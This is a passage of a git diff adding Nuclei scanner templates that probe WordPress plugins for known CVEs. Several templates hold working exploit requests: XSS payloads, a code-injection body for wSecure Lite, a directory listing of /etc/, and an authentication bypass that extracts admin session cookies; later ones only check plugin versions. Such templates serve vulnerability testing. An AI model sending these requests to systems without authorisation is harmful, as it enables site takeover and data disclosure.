+    path:
+      - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '</script><script>alert(document.domain)</script>'
+        part: body
+      - type: word
+        part: header
+        words:
+          - text/html
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2015-7377-2593.yaml b/poc/cve/CVE-2015-7377-2593.yaml
new file mode 100644
index 0000000000..a01041fa40
--- /dev/null
+++ b/poc/cve/CVE-2015-7377-2593.yaml
@@ -0,0 +1,32 @@
+id: CVE-2015-7377
+
+info:
+  name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference:
+    - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-7377
+ 
+  description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI."
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2016-1000136-2689.yaml b/poc/cve/CVE-2016-1000136-2689.yaml
new file mode 100644
index 0000000000..e361cd32d9
--- /dev/null
+++ b/poc/cve/CVE-2016-1000136-2689.yaml
@@ -0,0 +1,37 @@
+id: CVE-2016-1000136
+
+info:
+  name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin heat-trackr v1.0
+  reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=798
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
+ 
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-1000136
+    cwe-id: CWE-79
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '</script><script>alert(document.domain)</script>'
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2016-1000138-2697.yaml b/poc/cve/CVE-2016-1000138-2697.yaml
new file mode 100644
index 0000000000..de633c8c62
--- /dev/null
+++ b/poc/cve/CVE-2016-1000138-2697.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000138
+info:
+  name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-1000138
+    cwe-id: CWE-79
+  description: "Reflected XSS in wordpress plugin indexisto v1.0.5"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+      - type: word
+        part: header
+        words:
+          - text/html
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2016-1000149-2725.yaml b/poc/cve/CVE-2016-1000149-2725.yaml
new file mode 100644
index 0000000000..7998ec03d5
--- /dev/null
+++ b/poc/cve/CVE-2016-1000149-2725.yaml
@@ -0,0 +1,35 @@
+id: CVE-2016-1000149
+
+info:
+  name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-1000149
+    cwe-id: CWE-79
+  description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2016-1000152-2731.yaml b/poc/cve/CVE-2016-1000152-2731.yaml
new file mode 100644
index 0000000000..0b026d29ac
--- /dev/null
+++ b/poc/cve/CVE-2016-1000152-2731.yaml
@@ -0,0 +1,35 @@
+id: CVE-2016-1000152
+
+info:
+  name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin tidio-form v1.0
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
+ 
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-1000152
+    cwe-id: CWE-79
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2016-10960-2763.yaml b/poc/cve/CVE-2016-10960-2763.yaml
new file mode 100644
index 0000000000..7d70ef5104
--- /dev/null
+++ b/poc/cve/CVE-2016-10960-2763.yaml
@@ -0,0 +1,34 @@
+id: CVE-2016-10960
+
+info:
+  name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
+  author: daffainfo
+  severity: high
+  description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
+  reference:
+    - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
+    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+  tags: cve,cve2016,wordpress,wp-plugin,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.80
+    cve-id: CVE-2016-10960
+    cwe-id: CWE-20
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
+    body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Nuclei: CVE-2016-10960"
+        condition: and
+        part: header
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2017-1000170-2837.yaml b/poc/cve/CVE-2017-1000170-2837.yaml
new file mode 100644
index 0000000000..234f130531
--- /dev/null
+++ b/poc/cve/CVE-2017-1000170-2837.yaml
@@ -0,0 +1,35 @@
+id: CVE-2017-1000170
+info:
+  name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
+  author: dwisiswant0
+  severity: high
+  description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.
+  reference:
+    - https://www.exploit-db.com/exploits/49693
+    - https://github.com/jqueryfiletree/jqueryfiletree/issues/66
+    - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2017-1000170
+    cwe-id: CWE-22
+  tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
+    body: "dir=%2Fetc%2F&onlyFiles=true"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<li class='file ext_passwd'>"
+          - "<a rel='/passwd'>passwd</a></li>"
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/poc/cve/CVE-2018-11709-3197.yaml b/poc/cve/CVE-2018-11709-3197.yaml
new file mode 100644
index 0000000000..361494985c
--- /dev/null
+++ b/poc/cve/CVE-2018-11709-3197.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-11709
+info:
+  name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
+  tags: cve,cve2018,wordpress,xss,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2018-11709
+    cwe-id: CWE-79
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+      - type: word
+        part: header
+        words:
+          - text/html
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2018-18069-3429.yaml b/poc/cve/CVE-2018-18069-3429.yaml
new file mode 100644
index 0000000000..2f61102505
--- /dev/null
+++ b/poc/cve/CVE-2018-18069-3429.yaml
@@ -0,0 +1,27 @@
+id: CVE-2018-18069
+
+info:
+  name: Wordpress unauthenticated stored xss
+  author: nadino
+  severity: medium
+  description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
+  tags: cve,cve2018,wordpress,xss,plugin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2018-18069
+    cwe-id: CWE-79
+  reference:
+    - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin.php"
+    body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
+    redirects: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
diff --git a/poc/cve/CVE-2019-15858-3888.yaml b/poc/cve/CVE-2019-15858-3888.yaml
new file mode 100644
index 0000000000..ce89ccbfe4
--- /dev/null
+++ b/poc/cve/CVE-2019-15858-3888.yaml
@@ -0,0 +1,52 @@
+id: CVE-2019-15858
+
+info:
+  name: WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution
+  author: dwisiswant0,fmunozs,patralos
+  severity: high
+  description: |
+    WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.
+  reference:
+    - https://github.com/GeneralEG/CVE-2019-15858
+    - https://blog.nintechnet.com/multiple-vulnerabilities-in-wordpress-woody-ad-snippets-plugin-lead-to-remote-code-execution/
+    - https://wpvulndb.com/vulnerabilities/9490
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15858
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-15858
+    cwe-id: CWE-306
+    cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:*:*:*
+    epss-score: 0.02375
+  tags: cve,cve2019,wordpress,wp-plugin,xss,wp
+  metadata:
+    max-request: 1
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "2.2.5"
+        negative: true
+
+      - type: word
+        part: body
+        words:
+          - "Changelog"
+
+      - type: word
+        part: body
+        words:
+          - "Woody ad snippets"
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/14
diff --git a/poc/cve/CVE-2019-6112-4173.yaml b/poc/cve/CVE-2019-6112-4173.yaml
new file mode 100644
index 0000000000..0c0ecc83ea
--- /dev/null
+++ b/poc/cve/CVE-2019-6112-4173.yaml
@@ -0,0 +1,35 @@
+id: CVE-2019-6112
+
+info:
+  name: WordPress Sell Media 2.4.1 - Cross-Site Scripting
+  author: dwisiswant0
+  severity: medium
+  description: WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
+  reference:
+    - https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-6112
+    - https://metamorfosec.com/Files/Advisories/METS-2020-001-A_XSS_Vulnerability_in_Sell_Media_Plugin_v2.4.1_for_WordPress.txt
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-6112
+    cwe-id: CWE-79
+  tags: cve,cve2019,wordpress,wp-plugin,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
+          - "alert(1337)"
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/05/04
diff --git a/poc/cve/CVE-2020-8771-5336.yaml b/poc/cve/CVE-2020-8771-5336.yaml
new file mode 100644
index 0000000000..98b42b98a1
--- /dev/null
+++ b/poc/cve/CVE-2020-8771-5336.yaml
@@ -0,0 +1,61 @@
+id: CVE-2020-8771
+
+info:
+  name: WordPress Time Capsule < 1.21.16 - Authentication Bypass
+  author: princechaddha
+  severity: critical
+  description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.
+  reference:
+    - https://github.com/SECFORCE/WPTimeCapsulePOC
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8771
+    - https://wpvulndb.com/vulnerabilities/10010
+    - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-8771
+    cwe-id: CWE-287
+  tags: cve,cve2020,wordpress,wp-plugin
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept: */*
+
+        IWP_JSON_PREFIX
+
+      - |
+        GET /wp-admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept: */*
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
+          - "<h1>Dashboard</h1>"
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - 'text/html'
+        part: header
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: header
+        regex:
+          - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
+
+# Enhanced by mp on 2022/04/29
diff --git a/poc/cve/CVE-2021-24146-5627.yaml b/poc/cve/CVE-2021-24146-5627.yaml
new file mode 100644
index 0000000000..c950e67161
--- /dev/null
+++ b/poc/cve/CVE-2021-24146-5627.yaml
@@ -0,0 +1,27 @@
+id: CVE-2021-24146
+
+info:
+  name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
+  description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
+  author: random_robbie
+  severity: high
+  reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
+  tags: wordpress,wp-plugin,cve,cve2021
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "mec-events"
+          - "text/csv"
+        condition: and
+        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2021-24146-5629.yaml b/poc/cve/CVE-2021-24146-5629.yaml
new file mode 100644
index 0000000000..73fb2dc104
--- /dev/null
+++ b/poc/cve/CVE-2021-24146-5629.yaml
@@ -0,0 +1,25 @@
+id: cve-2021-24146
+
+info:
+  name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
+  description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
+  author: random_robbie
+  severity: high
+  reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
+  tags: wordpress,wp-plugin,cve,cve2021
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "mec-events"
+        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/cve/CVE-2021-24210-5644.yaml b/poc/cve/CVE-2021-24210-5644.yaml
new file mode 100644
index 0000000000..e40368cb13
--- /dev/null
+++ b/poc/cve/CVE-2021-24210-5644.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-24210
+
+info:
+  name: PhastPress < 1.111 - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page
+    with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year
+    ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only
+    go to whitelisted pages but it's possible to redirect the victim to any domain.
+  reference:
+    - https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb
+    - https://plugins.trac.wordpress.org/changeset/2497610/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-24210
+    cwe-id: CWE-601
+  tags: wordpress,cve,cve2021,redirect
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com"
+
+    matchers:
+      - type: regex
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+        part: header
diff --git a/poc/cve/CVE-2021-25033-5788.yaml b/poc/cve/CVE-2021-25033-5788.yaml
new file mode 100644
index 0000000000..9a759a6b94
--- /dev/null
+++ b/poc/cve/CVE-2021-25033-5788.yaml
@@ -0,0 +1,27 @@
+id: noptin-open-redirect
+
+info:
+  name: Noptin < 1.6.5 - Open Redirect
+  author: dhiyaneshDk
+  severity: low
+  description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue.
+  reference:
+    - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c
+    - https://plugins.trac.wordpress.org/changeset/2639592
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25033
+  classification:
+    cve-id: CVE-2021-25033
+  tags: wordpress,redirect,wp-plugin,noptin,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/04/13
diff --git a/poc/cve/CVE-2021-25118(1).yaml b/poc/cve/CVE-2021-25118(1).yaml
new file mode 100644
index 0000000000..0735b7ba93
--- /dev/null
+++ b/poc/cve/CVE-2021-25118(1).yaml
@@ -0,0 +1,58 @@
+id: CVE-2021-25118
+
+info:
+  name: Yoast SEO 16.7-17.2 - Information Disclosure
+  author: DhiyaneshDK
+  severity: medium
+  description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the target system.
+  remediation: Fixed in version 17.3.
+  reference:
+    - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550
+    - https://plugins.trac.wordpress.org/changeset/2608691
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25118
+    - https://github.com/20142995/sectool
+    - https://github.com/ARPSyndicate/cvemon
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2021-25118
+    cwe-id: CWE-200
+    epss-score: 0.00173
+    epss-percentile: 0.5348
+    cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    vendor: yoast
+    product: yoast_seo
+    framework: wordpress
+  tags: cve2021,cve,wpscan,wordpress,wp-plugin,fpd,wp,yoast
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: regex
+        regex:
+          - '"path":"(.*)/wp-content\\(.*)","size'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - '"path":"(.*)/wp-content\\(.*)","size'
+        part: body
+# digest: 4a0a00473045022100ba7a661218a1675b4be3d3970f6130b049f1a01cdf39b787b6305b14f5d7890302206dac7b754b0ebb88e2061818cbef0180bf4b74b44844829f6821143b16255802:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/CVE-2023-6978.yaml b/poc/cve/CVE-2023-6978.yaml
new file mode 100644
index 0000000000..73755f0938
--- /dev/null
+++ b/poc/cve/CVE-2023-6978.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-6978
+
+info:
+  name: >
+    WP Job Manager – Company Profiles <= 1.7 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    The WP Job Manager – Company Profiles plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'company' parameter in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8edba5b-9bce-4a93-86a6-bb6dcb30fa60?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-6978
+  metadata:
+    fofa-query: "wp-content/plugins/wp-job-manager-companies/"
+    google-query: inurl:"/wp-content/plugins/wp-job-manager-companies/"
+    shodan-query: 'vuln:CVE-2023-6978'
+  tags: cve,wordpress,wp-plugin,wp-job-manager-companies,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-job-manager-companies/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "wp-job-manager-companies"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10056-a8d2a1d47ca5a0c2f053a977af04fb8c.yaml b/poc/cve/CVE-2024-10056-a8d2a1d47ca5a0c2f053a977af04fb8c.yaml
new file mode 100644
index 0000000000..f82eee6742
--- /dev/null
+++ b/poc/cve/CVE-2024-10056-a8d2a1d47ca5a0c2f053a977af04fb8c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10056-a8d2a1d47ca5a0c2f053a977af04fb8c
+
+info:
+  name: >
+    Contact Form Builder <= 4.10.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via livesite-pay Shortcode
+  author: topscoder
+  severity: low
+  description: >
+    The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's livesite-pay shortcode in all versions up to, and including, 4.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1b419c-2276-415d-8c54-15da9125c442?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-10056
+  metadata:
+    fofa-query: "wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/"
+    google-query: inurl:"/wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/"
+    shodan-query: 'vuln:CVE-2024-10056'
+  tags: cve,wordpress,wp-plugin,contact-form-with-a-meeting-scheduler-by-vcita,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "contact-form-with-a-meeting-scheduler-by-vcita"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 4.10.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10178-8d00ef32d8cfb13b51bc10bd4d6d2d45.yaml b/poc/cve/CVE-2024-10178-8d00ef32d8cfb13b51bc10bd4d6d2d45.yaml
new file mode 100644
index 0000000000..7e432693b9
--- /dev/null
+++ b/poc/cve/CVE-2024-10178-8d00ef32d8cfb13b51bc10bd4d6d2d45.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10178-8d00ef32d8cfb13b51bc10bd4d6d2d45
+
+info:
+  name: >
+    Gutentor – Gutenberg Blocks – Page Builder for Gutenberg Editor <= 3.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Widget
+  author: topscoder
+  severity: low
+  description: >
